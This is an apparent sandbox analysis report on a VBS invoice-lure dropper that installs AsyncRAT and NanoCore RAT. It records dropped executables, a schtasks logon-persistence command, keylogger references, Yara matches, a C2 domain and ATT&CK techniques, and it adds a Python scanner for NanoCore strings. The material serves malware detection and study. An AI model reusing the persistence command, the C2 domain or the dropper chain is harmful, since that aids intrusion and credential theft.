            Source: Notepads.exe, 0000001A.00000003.562007200.000000001C859000.00000004.00000001.sdmp - Binary or memory string: lows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp - Binary or memory string: Hyper-V RAWance%SystemRoot%\system32\mswsock.dll2e,00,4e,00,45,00,54,00,20,00,43,00,4c,00,52,00,20,00,44,00,61,00,74,00,61,00,00,00,00,00.NET CLR Data6
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus
            Source: ame.exe, 00000003.00000003.526118644.000000001C031000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000003.574433837.000000001BCD9000.00000004.00000001.sdmp - Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: Hyper-V Hypervisor
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp - Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx BusM
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: !Hyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.534630144.0000000000AD8000.00000004.00000020.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider PipesP
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp - Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\fi.exe - Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe - File created: ame.exe.1.dr
            .NET source code references suspicious native API functions
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs - Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs - Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs - Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs - Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs - Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs - Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: C:\Windows\System32\wscript.exe - Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exe - Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exe - Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmp - Binary or memory string: Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp - Binary or memory string: Shell_TrayWnd
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp - Binary or memory string: Progman
            Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmp - Binary or memory string: Program Manager*
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp - Binary or memory string: &Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp - Binary or memory string: Progmanlock
            Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmp - Binary or memory string: Program Manager|
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp - Binary or memory string: =rProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

            Stealing of Sensitive Information:

Yara detected Nanocore RAT
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

Detected Nanocore Rat
            Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exeString found in binary or memory: NanoCore.ClientPluginHost
Source: fi.exe, 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe.4.drString found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT: the same Yara matches as listed under Stealing of Sensitive Information above.
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428EA bind,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428A9 bind,
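The NanoCore.ClientPluginHost metadata names shown above are what the report's Yara rules and the "Detected Nanocore Rat" signature key on. The following is an added example, not part of the Joe Sandbox report and not NanoCore's own code, that scans a file or memory dump for those markers in both the UTF-8 form they take in a .NET assembly's #Strings heap and the UTF-16LE form of runtime strings. The marker list is taken from the strings above; the two-marker threshold, the constructed sample buffers and the function names are assumptions made for illustration.

```python
"""Scan a buffer for the NanoCore client-plugin names this report lists.

Added example, not part of the Joe Sandbox report and not NanoCore's code.
The marker list comes from the strings the report shows in fi.exe and
dhcpmon.exe memory; the two-marker threshold is an assumption.
"""
import re
from typing import Dict, List, Tuple

MARKERS = (
    "NanoCore.ClientPluginHost",
    "NanoCore.ClientPlugin",
    "IClientNetworkHost",
    "IClientLoggingHost",
    "ClientPlugin.dll",
)

# Type and member names live in the .NET #Strings heap as UTF-8, but user
# strings (#US heap) and strings built at runtime are UTF-16LE, so an
# ASCII-only search misses half of the places a marker can turn up.
ENCODINGS = ("utf-8", "utf-16-le")


def find_markers(data: bytes) -> Dict[str, List[Tuple[int, str]]]:
    """Return {marker: [(offset, encoding), ...]} for every hit in data.

    Longer markers are searched first so that a prefix such as
    NanoCore.ClientPlugin is not counted a second time inside a
    NanoCore.ClientPluginHost hit at the same offset."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    claimed: List[Tuple[int, int, str]] = []  # spans already owned by a longer marker
    for marker in sorted(MARKERS, key=len, reverse=True):
        for enc in ENCODINGS:
            for m in re.finditer(re.escape(marker.encode(enc)), data):
                inside_longer = any(
                    s <= m.start() and m.end() <= e and enc == x for s, e, x in claimed
                )
                if inside_longer:
                    continue
                claimed.append((m.start(), m.end(), enc))
                hits.setdefault(marker, []).append((m.start(), enc))
    return hits


def is_nanocore_candidate(data: bytes, min_distinct: int = 2) -> bool:
    """True when at least min_distinct different markers are present (assumed threshold)."""
    return len(find_markers(data)) >= min_distinct


def scan_file(path: str) -> bool:
    with open(path, "rb") as fh:
        return is_nanocore_candidate(fh.read())


# Constructed buffers (not real dumps): a #Strings-heap style fragment, a
# runtime-string style fragment, and a benign PE header fragment.
SAMPLE_METADATA = b"\x00mscorlib\x00NanoCore.ClientPluginHost\x00IClientNetworkHost\x00"
SAMPLE_RUNTIME = (
    b"\x00\x00"
    + "NanoCore.ClientPlugin".encode("utf-16-le")
    + b"\x00\x00"
    + "ClientPlugin.dll".encode("utf-16-le")
)
SAMPLE_BENIGN = b"MZ\x90\x00\x03 This program cannot be run in DOS mode. ClientHost"

if __name__ == "__main__":
    for name, buf in (("metadata", SAMPLE_METADATA), ("runtime", SAMPLE_RUNTIME), ("benign", SAMPLE_BENIGN)):
        print(f"{name}: candidate={is_nanocore_candidate(buf)} hits={find_markers(buf)}")
```

The UTF-16LE pass matters for memory dumps such as the .sdmp regions above: a plugin name that was materialised as a managed string at runtime will not match an ASCII pattern, which is one reason memory-based Yara rules for .NET RATs usually carry both a plain and a `wide` variant of each string.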

Mitre Att&ck Matrix

Techniques with signature hits, grouped by tactic. The digits after each technique are the report's signature-count badges; matrix cells without a badge are omitted.

Initial Access: none
Execution: Scripting 221; Native API 1; Exploitation for Client Execution 1; Scheduled Task/Job 2
Persistence: Windows Service 2; Scheduled Task/Job 2
Privilege Escalation: Access Token Manipulation 1; Windows Service 2; Process Injection 12; Scheduled Task/Job 2
Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 1; Scripting 221; Obfuscated Files or Information 121; Software Packing 12; Timestomp 1; Masquerading 2; Virtualization/Sandbox Evasion 31; Access Token Manipulation 1; Process Injection 12; Hidden Files and Directories 1
Credential Access: Input Capture 121
Discovery: File and Directory Discovery 1; System Information Discovery 13; Query Registry 1; Security Software Discovery 211; Process Discovery 2; Virtualization/Sandbox Evasion 31; Application Window Discovery 1; Remote System Discovery 1
Lateral Movement: none
Collection: Archive Collected Data 11; Input Capture 121
Exfiltration: none
Command and Control: Encrypted Channel 1; Non-Standard Port 1; Remote Access Software 1; Non-Application Layer Protocol 1; Application Layer Protocol 11
Network Effects, Remote Service Effects, Impact: none

            Behavior Graph

Behavior Graph ID: 404165. Sample: Invoice No F1019855_PDF.vbs. Start date: 04/05/2021. Architecture: WINDOWS. Score: 100.

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures. Contacted domain: sys2021.linkpc.net.

Process tree, dropped files and network contacts recovered from the graph:

wscript.exe (Invoice No F1019855_PDF.vbs)
